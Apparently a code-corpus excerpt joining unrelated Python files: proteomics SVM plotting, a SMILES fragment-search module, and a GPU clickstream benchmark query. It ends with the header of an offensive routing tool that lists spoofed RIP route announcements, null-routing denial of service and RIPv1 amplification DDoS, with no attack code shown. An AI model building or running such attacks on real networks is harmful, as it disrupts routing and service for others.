SVM_dict_total["Avg. all organelles"] = {"Recall": av_per_organelle_recall, "F1": avg_organelle_f1, "Precision": av_per_organelle_precision}
SVM_dict_total["Membrane"] = {"Recall": membrane_recall}
SVM_dict_total["Median. per organelle"] = {"Recall": median_per_organelle_recall}
global_SVM_dict[exp] = SVM_dict
global_SVM_dict_total[exp] = SVM_dict_total
self.global_SVM_dict = global_SVM_dict
self.global_SVM_dict_total = global_SVM_dict_total
if global_SVM_dict=={}:
self.cache_stored_SVM = False
return
else:
df_clusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict[i][j]
for i in global_SVM_dict.keys()
for j in global_SVM_dict[i].keys()},
orient='index')
df_clusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_clusterPerformance_global = df_clusterPerformance_global.T
df_AvgClusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict_total[i][j]
for i in global_SVM_dict_total.keys()
for j in global_SVM_dict_total[i].keys()},
orient='index')
df_AvgClusterPerformance_global.index.names = ["Experiment", "Type"]
self.df_AvgClusterPerformance_global = df_AvgClusterPerformance_global.T
self.cache_stored_SVM = True
return
def svm_plotting(self, multi_choice):
"""
The markerperformance (line/scatter plot) as well as marker prediction accuracy (bar plot) is visuaized.
Args:
self: df_AvgClusterPerformance_global
df_clusterPerformance_global
multi_choice: list of experiment names
"""
df_clusterPerformance_global = self.df_clusterPerformance_global
df_AvgClusterPerformance_global = self.df_AvgClusterPerformance_global
df_AvgAllCluster = df_AvgClusterPerformance_global.xs("Avg. all clusters", level='Type', axis=1)
fig_markerPredictionAccuracy = go.Figure()#data=[go.Bar(x=df_test.columns, y=df_test.loc["Recall"])])
for exp in multi_choice:
fig_markerPredictionAccuracy.add_trace(go.Bar(x=[exp], y=[df_AvgAllCluster[exp].loc["Recall"]], name=exp))
fig_markerPredictionAccuracy.update_layout(template="simple_white", #showlegend=False,
title="Marker prediction accuracy - Overall recall",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Marker prediction accuracy [%]",
mirror=True),
)
fig_clusterPerformance = go.Figure()
list_data_type = ["Avg. all clusters", "Avg. all organelles"]
for i,exp in enumerate(multi_choice):
df_clusterPerformance = df_clusterPerformance_global.xs(exp, level='Experiment', axis=1)
df_AvgClusterPerformance = df_AvgClusterPerformance_global.xs(exp, level='Experiment', axis=1)
fig_clusterPerformance.add_trace(go.Scatter(x=df_clusterPerformance.columns, y=df_clusterPerformance.loc["F1"],
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i]), name=exp))
for data_type in list_data_type:
fig_clusterPerformance.add_trace(go.Scatter(x=[data_type], y=[df_AvgClusterPerformance[data_type].loc["F1"]],
mode="markers",
showlegend=False,
marker=dict(color=pio.templates["simple_white"].layout["colorway"][i])
))
fig_clusterPerformance.update_layout(template="simple_white", #showlegend=False,
title="Cluster wise SVM analysis",
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="F1 score", #- harmonic mean of recall and precision
mirror=True),
)
return fig_markerPredictionAccuracy, fig_clusterPerformance
def __repr__(self):
return str(self.__dict__)
#return "This is a spatial dataset with {} lines.".format(len(self.df_original))
def svm_heatmap(df_SVM):
"""
The misclassification matrix, generated by Perseus, will be displayed as a heatmap.
Args:
self.df_SVM: dataframe, provided by Perseus, no index;
Column names: e.g. "Predicted: ER", "Predicted: NPC"
Rows: e.g. "True: ER", "True: NPC"
Returns:
fig_SVMheatmap: heatmap of the misclassification matrix
"""
#df_SVM = self.df_SVM.copy()
#if hasattr(df_SVM, "keys") == True:
try:
df_SVM = pd.read_json(df_SVM["Misclassification Matrix"])
df_SVM = df_SVM.set_index("T: True group")[::-1]
except:
df_SVM = df_SVM.set_index("T: True group")[::-1]
y_axis_label = df_SVM.index
x_axis_label = df_SVM.columns
data_svm = df_SVM.values
fig_SVMheatmap = go.Figure()
fig_SVMheatmap.add_trace(go.Heatmap(
z=data_svm,
x = x_axis_label,
y = y_axis_label,
colorscale=[
[0.0, "green"],
[0.01, "white"],
[1.0, "red"]
],
))
return fig_SVMheatmap
def reframe_df_01_fromJson_for_Perseus(json_dict):
"""
Make 0-1 normalized data from all experiments available for Perseus
Args:
json: dictionary, json file uploaded in manage dataset tab.
Return:
df: 0-1 normlaized data (globally normalized), with Gene names, Protein IDs, Comaprtment as columns
Pattern for Column data: Exp_Map_Fraction
"""
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data" and exp_name == list(json_dict.keys())[0]:
df_01_combined = pd.read_json(json_dict[exp_name][data_type])
df_01_combined = df_01_combined.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
df_01_combined.drop([col for col in df_01_combined.columns if not col.startswith("normalized profile")])
df_01_combined.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_combined.columns], names=["Set", "Map", "Fraction"])
df_01_combined.rename(columns = {"normalized profile":exp_name}, inplace=True)
elif data_type == "0/1 normalized data" and exp_name != list(json_dict.keys())[0]:
df_01_toadd = pd.read_json(json_dict[exp_name][data_type])
df_01_toadd = df_01_toadd.set_index(["Gene names", "Protein IDs", "Compartment"]).copy()
df_01_toadd.drop([col for col in df_01_toadd.columns if not col.startswith("normalized profile")])
df_01_toadd.columns = pd.MultiIndex.from_tuples([el.split("?") for el in df_01_toadd.columns], names=["Set", "Map", "Fraction"])
df_01_toadd.rename(columns = {"normalized profile":exp_name}, inplace=True)
df_01_combined = pd.concat([df_01_combined, df_01_toadd], axis=1)
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
df = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
df = df.div(df.sum(axis=1), axis=0)
index_ExpMap = df.index.get_level_values("Experiment")+"_"+df.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df.set_index(index_ExpMap, append=True, inplace=True)
df.index = df.index.droplevel(["Map", "Experiment"])
df = df.stack("Fraction").unstack(["Exp_Map", "Fraction"])
df.columns = ["_".join(col) for col in df.columns.values]
return df
|
py | 1a4fb284afe55a711b6a5f7dc0876436f3dd0e42 |
from src.smiles_to_structure import convert_to_structure, MoleculeStructure, Fragment
from collections import Counter
from termcolor import cprint
from src.fragments_library import special_cases, biomolecules, peptide_amino_acids, heterocycles, \
common_aromatic_heterocycles, generalized_heterocycles, arenes, functional_groups, hydrocarbons, aromatic_fragments
'''The find_fragment method allows a substructure search of a given chemical fragment within a molecule
(subgraph isomorphism). Takes
The fragmentize method allows a library of fragments to be searched for within a molecule via the find_fragment method.
Takes the SMILES string of a molecule and fragment libraries as *args as inputs.
The fragment library should be ordered hierarchically, with more complex fragments being searched first. Atoms found in
any given substructure search are marked as discovered and are not used in further substructure searches (unless
specified as "phantom atoms", see fragments_library).
The method will return a list of names of the fragments found and the labeled molecular structure as a tuple
-> (fragment_names_list, labeled_structure)
If numeric=True, will return a vector with the count of the number of each fragment found and the labeled molecular
structure as a tuple
-> (fragment_vector, labeled_structure)
'''
class AtomData:
def __init__(self, symbol):
self.symbol = symbol
self.bond = None
self.daughter_branches = []
self.ring_closures = set()
self.phantom_bonds = None
self.phantom_atom = False
class Branch:
def __init__(self, bond):
self.bond = bond
self.sequence = []
def abbr_bond(bond):
return bond.bond_code, bond.atom.symbol
# bond_atom_info is the atom_info of the atom for the bond being checked (to see if it's a phantom bond/discovered)
def check_bond(bond, map_bond, bond_atom_info):
# if the bond.atom is discovered already, it should give back false (can't retread over discovered atoms)
# unless the atom_info for that atom shows that the bond.atom should be a phantom atom (which can be searched for in discovered atoms)
if bond.atom.discovered:
if not bond_atom_info.phantom_atom:
return False
if abbr_bond(bond) == map_bond:
return True
# need to cover (correct, R) (correct, Q) (9, R) (9, Q) (9, correct)
elif bond.bond_code == map_bond[0] or map_bond[0] == 9: # covers (correct, R) (correct, Q) (9, R) (9, Q)
if map_bond[1] == "R":
return True
elif map_bond[1] == "Q" and bond.atom.heteroatom:
return True
elif bond.atom.symbol == map_bond[1]:
if map_bond[0] == 9:
return True
else:
return False
def calc_branch_length(branch):
branch_length = 0
def add_daughter_branch_length(daughter_branch):
nonlocal branch_length
branch_length += len(daughter_branch.sequence)
if len(daughter_branch.sequence[-1].daughter_branches) > 0:
for b in daughter_branch.sequence[-1].daughter_branches:
add_daughter_branch_length(b)
add_daughter_branch_length(branch)
return branch_length
def find_fragment(fragment_string, molecule_string, fragment_name, structure=None, verbose=False):
verbose_bin = []
if structure:
molecule_structure = structure
else:
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragment_structure = convert_to_structure(MoleculeStructure(), fragment_string)
def find_anchor_atom(fragment):
for ele in ["Si", "P", "p", "S", "s", "I", "Br", "Cl", "F", "B", "b", "O", "o", "N", "n", "C", "c", "R"]:
for atom in fragment.atom_list:
if atom.symbol == ele:
return atom
fragment_anchor_atom = find_anchor_atom(fragment_structure)
# the actual atom object of highest priority in the fragment structure
def is_potential_anchor(atom, fragment_anchor_atom, atom_list):
# searches through all atoms in molecules in total_molecule to see if they match the fragment base atom
# atom -> current atom its checking
# atom_list is list where potential anchor atoms are stored
# fragment_anchor_atom is the actual atom object from the fragment structure
if atom.discovered and not fragment_anchor_atom.phantom_atom: # if fragment_anchor atom is a phantom atom, it can use discovered atoms as potential anchors
return
# atom has already been used to find a fragment
if atom.symbol != fragment_anchor_atom.symbol and fragment_anchor_atom.symbol != 'R': # TODO what about if anchor atom is Q!??
return
# check to see if atom is the same element
fragment_anchor_atom_bonds = Counter([abbr_bond(bond) for bond in fragment_anchor_atom.bonded_to])
# count bonds from anchor atom
atom_bonds = Counter([abbr_bond(bond) for bond in atom.bonded_to])
# count bonds in potential anchor atom where the bond's atom haven't been discovered yet (as we won't be able to use those bonds)
for key in fragment_anchor_atom_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this???
if key not in atom_bonds or fragment_anchor_atom_bonds[key] > atom_bonds[key]:
# check 1: are there bonds types in fragment base atom that current atom doesn't have
# check 2: does current atom have >= the amount of each bond type compared to fragment base atom
# i.e. are the bonds in fragment anchor atom a subset of the bonds of current atom
return
atom_list.append(atom)
# if all checks passed, atom is a potential base atom and is stored in a list
potential_anchor_atoms = []
# keeping track of atoms that match fragment base atom
for atom in molecule_structure.atom_list:
is_potential_anchor(atom, fragment_anchor_atom, potential_anchor_atoms)
if potential_anchor_atoms == []:
verbose_bin.append("no anchor atoms found")
return 0
else:
verbose_bin.append("potential anchor atoms: ")
for atom in potential_anchor_atoms:
verbose_bin.append(atom.symbol)
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
def map_fragment(fragment, anchor_atom):
visited = {}
for atom in fragment.atom_list:
visited[atom] = False
# keeps track of which atoms have been visited
atom_info_dict = {}
# links the molecule_atom and the atom_info representing that atom, used to pass ring_closure info to map
ring_closure_counter = 1
def traverse(current_atom, previous_atom, current_branch):
visited[current_atom] = True
current_atom_data = AtomData(current_atom.symbol)
# data object for current atom
# atom_data will reflect that the atom is a phantom_atom
if current_atom.phantom_atom:
current_atom_data.phantom_atom = True
atom_info_dict[current_atom] = current_atom_data
if current_branch:
current_branch.sequence.append(current_atom_data)
# append atom info to branch sequence
# if current_branch b/c first atom does not have a branch
current_atom_data.phantom_bonds = current_atom.phantom_bonds
unchecked_bonds = [bond for bond in current_atom.bonded_to if bond.atom != previous_atom]
nonlocal ring_closure_counter
# if more than 1 unchecked bonds (i.e. a branch point), create new branch for each unchecked bond
if len(unchecked_bonds) > 1:
for bond in unchecked_bonds:
if not visited[bond.atom]:
verbose_bin.append("new branch")
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
elif not bool(current_atom_data.ring_closures & atom_info_dict[bond.atom].ring_closures):
# if visited[bond.atom], we are at a ring closure
# this bool sees if the atom_info of these two atoms (current atom and the atom its bonded to) share any values (& operator)
# if they do, this ring closure has already been documented and we don't want to double count it
verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, bond.bond_code))
atom_info_dict[bond.atom].ring_closures.add((ring_closure_counter, bond.bond_code))
# add matching values to each atom_info.ring_closure
# ring closure data in format (ring closure #, bond_code)
ring_closure_counter += 1
# if a contiguous section of branch, add bond info
elif len(unchecked_bonds) == 1:
if current_branch:
if not visited[unchecked_bonds[0].atom]:
verbose_bin.append("continue branch")
current_atom_data.bond = abbr_bond(unchecked_bonds[0])
traverse(unchecked_bonds[0].atom, current_atom, current_branch)
elif not bool(current_atom_data.ring_closures & atom_info_dict[unchecked_bonds[0].atom].ring_closures):
verbose_bin.append("ring closure")
current_atom_data.ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
atom_info_dict[unchecked_bonds[0].atom].ring_closures.add((ring_closure_counter, unchecked_bonds[0].bond_code))
ring_closure_counter += 1
# same as above
else:
verbose_bin.append("new branch")
for bond in unchecked_bonds:
new_branch(bond.atom, current_atom, current_atom_data, bond.bond_code)
# if the anchor atom only has 1 bond, need to start a branch
else:
verbose_bin.append("end point")
if not current_branch:
return current_atom_data
# this returns anchor atom to the map_fragment function as the anchor atom is not spawned from a branch @
def new_branch(current_atom, previous_atom, previous_atom_data, bond_code):
current_branch = Branch((bond_code, current_atom.symbol))
# create new branch with bonding info to first atom in branch
previous_atom_data.daughter_branches.append(current_branch)
# add new branch to the atom which spawned it
traverse(current_atom, previous_atom, current_branch)
# start traverse on first atom in branch
# need to pass previous_atom in order to not travel backwards
return traverse(anchor_atom, None, None)
# starts process of mapping fragment, but also returns the anchor atom
anchored_fragment_map = map_fragment(fragment_structure, fragment_anchor_atom)
# the map base is the atom_data representation of the anchor atom
# the rest of the map is stored in the daughter branches
def expand_map(anchor_atom):
verbose_bin.append("anchor atom")
verbose_bin.append(anchor_atom.symbol)
if len(anchor_atom.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in anchor_atom.ring_closures:
verbose_bin.append(num)
if anchor_atom.phantom_bonds:
verbose_bin.append(f"phantom bonds = {anchor_atom.phantom_bonds}")
def expand_branch_point(atom_map):
for branch in atom_map.daughter_branches:
verbose_bin.append("branch:")
verbose_bin.append(f"branch length: {len(branch.sequence)}")
verbose_bin.append(f"total branch length: {calc_branch_length(branch)}")
verbose_bin.append(f"bond to branch: {branch.bond}")
for atom_info in branch.sequence:
verbose_bin.append(atom_info.symbol)
if len(atom_info.ring_closures) > 0:
verbose_bin.append("ring closures:")
for num in atom_info.ring_closures:
verbose_bin.append(num)
if atom_info.phantom_bonds:
verbose_bin.append(f"phantom bonds = {atom_info.phantom_bonds}")
if atom_info.bond:
verbose_bin.append(atom_info.bond)
if len(atom_info.daughter_branches) > 0:
verbose_bin.append("branch point")
expand_branch_point(atom_info)
expand_branch_point(anchor_atom)
verbose_bin.append("\nexpanded map:\n")
expand_map(anchored_fragment_map)
def check_anchor_atom(potential_anchor_atom, fragment_map):
molecule_atoms = {potential_anchor_atom}
# list to keep track of which atoms in the molecule constitute a matched fragment
currently_visited = {potential_anchor_atom: fragment_map}
# dictionary that keeps track of which atoms have been used to find the fragment at any given step
def check_branch_point(current_molecule_atom, previous_molecule_atom, map_atom_info, branch_atoms):
if map_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != map_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
# phantom_bonds is a way to ensure the current atom is bonded to the specified number of atoms
# note that phantom bonds includes any bonds for the current molecule_atom, including those to atoms that are "discovered"
branch_point_atoms = set()
nonlocal currently_visited
verbose_bin.append("I'm trying a branch point")
map_atom_info.daughter_branches.sort(key=calc_branch_length, reverse=True)
# this makes longer branches go first -> have to search the longest branch first
# otherwise a shorter branch might be identified in what is actually the long branch
# i.e. if atom has ethyl and propyl group, you could find the ethyl group where the propyl group is and then be unable to find propyl group
# also important - need to caculate the total branch length (including length of all its daughter branches)
verbose_bin.append("branch point bonds check")
unchecked_bonds = Counter([abbr_bond(bond) for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom])
fragment_branch_point_bonds = Counter([branch.bond for branch in map_atom_info.daughter_branches])
verbose_bin.append(unchecked_bonds)
verbose_bin.append(fragment_branch_point_bonds)
# subset check on branch point, just to make sure current atom has all the bonds the fragment branchpoint has
for key in fragment_branch_point_bonds:
if key[1] != "R" and key[1] != "Q" and key[0] != 9: # TODO better way to do this?
if key not in unchecked_bonds or fragment_branch_point_bonds[key] > unchecked_bonds[key]:
verbose_bin.append("branch point doesn't contain necessary bonds")
return False
branch_check = {}
for branch in map_atom_info.daughter_branches:
branch_check[branch] = False
# set all branches to unconfirmed
trial_paths = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
# available routes to see if branch matches
checked_paths = []
# keeps track of bonds that have been used to successfully identify branches
for branch in map_atom_info.daughter_branches:
# take each branch
for bond in trial_paths:
if check_bond(bond, branch.bond, branch.sequence[0]) and bond not in checked_paths and bond.atom not in currently_visited:
# if the bond to the branch matches the current bond (and the current bond hasn't already been used to identify a branch):
if try_branch(branch.sequence, bond.atom, current_molecule_atom, branch_point_atoms):
# test to see if the current branch works on this bond path
verbose_bin.append("branch successful")
branch_check[branch] = True
checked_paths.append(bond)
# if true, the branch was successfully found, turn branch to True in branch check
# add bond used to checked_paths so it isn't used for further branches
break
# need to stop the for loop so it doesn't search the matched branch in further trial_paths
else:
verbose_bin.append("branch not successful")
if all(value is True for value in branch_check.values()):
verbose_bin.append("branch point match")
if branch_atoms:
branch_atoms.update(branch_point_atoms)
else:
molecule_atoms.update(branch_point_atoms)
# first branch point does not have a branch that spawned it
return True
# if all branches have been found, they will be True in branch_check, branch point is a match, return True
else:
verbose_bin.append("branch point not matched")
return False
# one or more branches were found, branch point wasn't a match, return False
def try_branch(branch_sequence, current_molecule_atom, previous_molecule_atom, branch_point_atoms):
branch_atoms = set()
verbose_bin.append("I'm trying a branch!")
if check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, 0, branch_atoms):
branch_point_atoms.update(branch_atoms)
# add branch_atoms to branch point_atoms
return True
else:
nonlocal currently_visited
for a in branch_atoms:
currently_visited.pop(a)
def check_ring_closure(current_atom, atom_info): # already check if atom_info has ring closure
ring_closures = set() # all the ring closure numbers in currently_visited
for value in currently_visited.values():
ring_closures.update(value.ring_closures)
for closure_info in atom_info.ring_closures: # checking each ring closure atom has
verbose_bin.append("ring closure")
verbose_bin.append(closure_info)
if closure_info in ring_closures: # we've already hit the other half of the ring closure
for key in currently_visited: # looking for matching ring closure
if closure_info in currently_visited[key].ring_closures: # matched ring closure, key = atom it should be bonded to
ring_closure_partner = key
if ring_closure_partner in [bond.atom for bond in current_atom.bonded_to]:
ring_closure_bond = None
for bond in current_atom.bonded_to:
if bond.atom == ring_closure_partner:
ring_closure_bond = bond
if ring_closure_bond.bond_code != closure_info[1] and closure_info[1] != 9:
verbose_bin.append("closure bond incorrect")
return False
else:
verbose_bin.append("atom not bonded to correct closure partner")
return False
else:
return True
# first time encountering that ring closure number, don't need to do any further checks
verbose_bin.append("all ring closures acounted for")
return True
def check_atom_bonds(current_molecule_atom, previous_molecule_atom, branch_sequence, index, branch_atoms):
verbose_bin.append("checking atom")
verbose_bin.append(current_molecule_atom.symbol)
nonlocal currently_visited
current_atom_info = branch_sequence[index]
if current_atom_info.phantom_bonds:
bond_num = len(current_molecule_atom.bonded_to)
if bond_num != current_atom_info.phantom_bonds:
verbose_bin.append("wrong amount of phantom bonds")
return False
if current_atom_info.ring_closures:
if not check_ring_closure(current_molecule_atom, current_atom_info):
return False
currently_visited[current_molecule_atom] = current_atom_info
for a in currently_visited:
verbose_bin.append(a.symbol)
if currently_visited[a].ring_closures:
verbose_bin.append(currently_visited[a].ring_closures)
verbose_bin.append("\n")
branch_atoms.add(current_molecule_atom)
if len(current_atom_info.daughter_branches) > 0:
# atom is branch point and need to check branches
return check_branch_point(current_molecule_atom, previous_molecule_atom, current_atom_info, branch_atoms)
else:
# atom is either an endpoint or contiguous segment:
if not current_atom_info.bond:
verbose_bin.append("reached branch end")
# if no bond data, means we have matched the entire branch, return True
return True
else:
# else: this is a contiguous segment look for appropriate bonds
unchecked_bonds = [bond for bond in current_molecule_atom.bonded_to if bond.atom != previous_molecule_atom]
if len(unchecked_bonds) == 0:
verbose_bin.append("branch ended too early")
# actual branch has ended, but map says there should be another atom bonded here, therefore return False
return False
elif len(unchecked_bonds) == 1:
# actual molecule only has a contiguous segment here
verbose_bin.append(current_atom_info.bond)
verbose_bin.append(abbr_bond(unchecked_bonds[0]))
if check_bond(unchecked_bonds[0], current_atom_info.bond, branch_sequence[index + 1]) and unchecked_bonds[0].atom not in currently_visited:
return check_atom_bonds(unchecked_bonds[0].atom, current_molecule_atom, branch_sequence, index + 1, branch_atoms) # check next atom
# all branches should either return a function, True, or False. All child functions should do the same
# uncheck_bonds[0].atom becomes new current_molecule_atom, current_molecule_atom becomes previous_molecule_atom
# also pass the branch sequence and the index of the next atom_info in the branch
else:
verbose_bin.append("wrong bond or already visited")
return False
# the next atom in the branch either has the wrong bond or atom symbol
else:
# there are multiple possible paths branch could go
verbose_bin.append("checking multiple paths for branch")
# check all ways
for bond in unchecked_bonds:
if current_atom_info.bond != abbr_bond(bond): # this is purely for seeing what's happening
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
if check_bond(bond, current_atom_info.bond, branch_sequence[index + 1]) and bond.atom not in currently_visited:
verbose_bin.append(abbr_bond(bond))
verbose_bin.append(current_atom_info.bond)
# looks at all possible ways that match the correct bond
midway_fork = set()
# need to separate the branch_atoms here since we don't know if any of the paths will work
if check_atom_bonds(bond.atom, current_molecule_atom, branch_sequence, index + 1, midway_fork):
branch_atoms.update(midway_fork)
# if one of the paths works, add all the atoms from the midway_fork "branch"
return True
# return True if any of the paths work (also returns first found)
else:
for a in midway_fork:
currently_visited.pop(a)
# if midway_fork doesn't work, need to remove those atoms from currently_visited
return False
# if this else clause didn't return True (i.e. none of the paths succeeded)
# then none of the paths are productive, return false
if check_branch_point(potential_anchor_atom, None, fragment_map, None):
verbose_bin.append("phantom atom check")
for atom in currently_visited:
if not currently_visited[atom].phantom_atom:
# using currently visited to see if the atom_data that was used to find that atom was marked as a phantom_atom
# if it is a phantom atom, don't mark as discovered
atom.discovered = True
else:
verbose_bin.append("this atom should not be counted")
# running checks
verbose_bin.append(f"number of atoms in fragment: {len(molecule_atoms)}")
molecule_atoms2 = [atom.symbol for atom in molecule_atoms]
molecule_atoms2phantom = [atom.phantom_atom for atom in molecule_atoms]
if (len(molecule_atoms)) != len(currently_visited):
verbose_bin.append("error in number of atoms found")
for atom in molecule_atoms:
if atom not in currently_visited:
verbose_bin.append("error: descrepancy between currently_visited and molecule_atoms")
for atom in molecule_atoms:
verbose_bin.append(atom.symbol)
verbose_bin.append("matched fragment to anchor atom")
return Fragment(fragment_name, list(molecule_atoms)) # TODO currently this includes atoms that were found via phantom atoms (unclear if this is wanted behavior)
else:
verbose_bin.append("anchor atom not matched to fragment")
return False
# start from check_branch point on the potential anchor atom
# the anchor atom in map is treated as a branch point, even if it only has 1 branch
fragment_counter = 0
fragments_identified = []
for atom in potential_anchor_atoms:
verbose_bin.append("checking anchor atom")
for bond in atom.bonded_to:
verbose_bin.append(abbr_bond(bond))
is_found_fragment = check_anchor_atom(atom, anchored_fragment_map)
if is_found_fragment:
# add atoms found to fragment
fragment_counter += 1
fragments_identified.append(is_found_fragment)
verbose_bin.append(f"\nnumber of fragments found: {fragment_counter}")
if verbose:
for item in verbose_bin:
print(item)
return fragments_identified
def fragmentize(molecule_string, *fragment_libraries, numeric=False, verbose=False):
molecule_structure = convert_to_structure(MoleculeStructure(), molecule_string)
fragments = []
fragment_names = []
fragments_counter = []
generalized_heterocycles_found = []
for lib in fragment_libraries:
if lib != generalized_heterocycles:
for frag in lib:
frag_num = 0
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
frag_num += len(frag_res_found)
# can find multiples of a fragment
for f in frag_res_found:
fragments.append(f)
fragment_names.append(f.name)
fragments_counter.append(frag_num)
# for generalized heterocycles
else:
for frag in lib:
for frag_res_structure in lib[frag]:
frag_res_found = find_fragment(frag_res_structure, None, frag, structure=molecule_structure, verbose=verbose)
if frag_res_found:
for f in frag_res_found:
f.generalize_heterocycle_name()
generalized_heterocycles_found.append(f)
# possible varieties of generalized heterocycles
# name format: X-Y+ZM-het where X is number of heteroatoms, Y is the number of atoms in the ring and
# Z is the number of atoms in the fused ring
generalized_heterocycles_names = ["0-5M-het", "1-5M-het", "2-5M-het", "3-5M-het", "4-5M-het",
"0-6M-het", "1-6M-het", "2-6M-het", "3-6M-het", "4-6M-het",
"0-6+5M-het", "1-6+5M-het", "2-6+5M-het", "3-6+5M-het", "4-6+5M-het", "5-6+5M-het", "6-6+5M-het",
"0-6+6M-het", "1-6+6M-het", "2-6+6M-het", "3-6+6M-het", "4-6+6M-het", "5-6+6M-het", "6-6+6M-het"]
generalized_heterocycles_found_dict = {k:0 for k in generalized_heterocycles_names}
for heterocycle in generalized_heterocycles_found:
generalized_heterocycles_found_dict[heterocycle.name] += 1
fragments.append(heterocycle)
fragment_names.append(heterocycle.name)
for key in generalized_heterocycles_found_dict:
fragments_counter.append(generalized_heterocycles_found_dict[key])
molecule_structure.fragments_list = fragments
atoms_not_discovered = 0
for atom in molecule_structure.atom_list:
if not atom.discovered:
atoms_not_discovered += 1
if atoms_not_discovered > 0:
# total_frags = 0
# for lib in fragment_libraries:
# total_frags += len(lib)
cprint(f"atoms not found: {atoms_not_discovered}", "red")
cprint(molecule_string, 'red')
# return ["NA" for _ in range(total_frags)]
if numeric:
return fragments_counter, molecule_structure
else:
return fragment_names, molecule_structure
|
py | 1a4fb3870f8a267bd0a9b9419eebe985a7b281f1 | #
# Copyright (c) 2019-2022, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import cudf
from numba import cuda
from bdb_tools.readers import build_reader
q03_days_in_sec_before_purchase = 864000
q03_views_before_purchase = 5
q03_purchased_item_IN = 10001
q03_purchased_item_category_IN = 2, 3
q03_limit = 100
def read_tables(config, c=None):
table_reader = build_reader(
data_format=config["file_format"],
basepath=config["data_dir"],
split_row_groups=config["split_row_groups"],
)
item_cols = ["i_category_id", "i_item_sk"]
wcs_cols = [
"wcs_user_sk",
"wcs_click_time_sk",
"wcs_click_date_sk",
"wcs_item_sk",
"wcs_sales_sk",
]
item_df = table_reader.read("item", relevant_cols=item_cols)
wcs_df = table_reader.read("web_clickstreams", relevant_cols=wcs_cols)
if c:
c.create_table("web_clickstreams", wcs_df, persist=False)
c.create_table("item", item_df, persist=False)
return item_df
@cuda.jit
def find_items_viewed_before_purchase_kernel(
relevant_idx_col, user_col, timestamp_col, item_col, out_col, N
):
"""
Find the past N items viewed after a relevant purchase was made,
as defined by the configuration of this query.
"""
i = cuda.grid(1)
if i < (relevant_idx_col.size): # boundary guard
# every relevant row gets N rows in the output, so we need to map the indexes
# back into their position in the original array
orig_idx = relevant_idx_col[i]
current_user = user_col[orig_idx]
# look at the previous N clicks (assume sorted descending)
rows_to_check = N
remaining_rows = user_col.size - orig_idx
if remaining_rows <= rows_to_check:
rows_to_check = remaining_rows - 1
for k in range(1, rows_to_check + 1):
if current_user != user_col[orig_idx + k]:
out_col[i * N + k - 1] = 0
# only checking relevant purchases via the relevant_idx_col
elif (timestamp_col[orig_idx + k] <= timestamp_col[orig_idx]) & (
timestamp_col[orig_idx + k]
>= (timestamp_col[orig_idx] - q03_days_in_sec_before_purchase)
):
out_col[i * N + k - 1] = item_col[orig_idx + k]
else:
out_col[i * N + k - 1] = 0
def apply_find_items_viewed(df, item_mappings):
# need to sort descending to ensure that the
# next N rows are the previous N clicks
df = df.sort_values(
by=["wcs_user_sk", "tstamp", "wcs_sales_sk", "wcs_item_sk"],
ascending=[False, False, False, False],
)
df.reset_index(drop=True, inplace=True)
df["relevant_flag"] = (df.wcs_sales_sk != 0) & (
df.wcs_item_sk == q03_purchased_item_IN
)
df["relevant_idx_pos"] = df.index.to_series()
df.reset_index(drop=True, inplace=True)
# only allocate output for the relevant rows
sample = df.loc[df.relevant_flag == True]
sample.reset_index(drop=True, inplace=True)
N = q03_views_before_purchase
size = len(sample)
# we know this can be int32, since it's going to contain item_sks
out_arr = cuda.device_array(size * N, dtype=df["wcs_item_sk"].dtype)
find_items_viewed_before_purchase_kernel.forall(size)(
sample["relevant_idx_pos"],
df["wcs_user_sk"],
df["tstamp"],
df["wcs_item_sk"],
out_arr,
N,
)
result = cudf.DataFrame({"prior_item_viewed": out_arr})
del out_arr
del df
del sample
filtered = result.merge(
item_mappings,
how="inner",
left_on=["prior_item_viewed"],
right_on=["i_item_sk"],
)
return filtered
|
py | 1a4fb411975f9d81c6dee063f9adea912577ed27 | #!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
